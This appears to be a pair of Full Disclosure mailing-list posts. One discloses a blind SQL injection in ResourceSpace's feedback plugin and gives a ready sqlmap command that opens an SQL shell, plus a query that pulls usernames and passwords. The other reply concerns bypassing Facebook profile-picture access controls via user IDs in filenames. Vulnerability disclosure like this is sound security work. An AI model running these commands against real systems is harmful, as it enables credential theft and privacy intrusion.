[FD] Blind boolean SQL injection vulnerability in ResourceSpace CMS

a full sql shell: ./sqlmap.py -u "http:///plugins/feedback/pages/feedback.php" --cookie="user=test" --level=2 --technique=B --sql-shell This also allows an attacker to execute arbitrary queries such as 'select username, password, usergroup from user -- William

Re: [FD] Access anyone's Facebook "profile picture" in full resolution regardless of the ACL restriction

That's been on tracksomebody.com forever. See http://tracksomebody.com/?p=173 William Reyor @wreyor > On Apr 3, 2014, at 12:07 PM, illwill wrote: > > did you know the second section of the filename is the users actual > facebook user id? > 6549_*16544614736*_444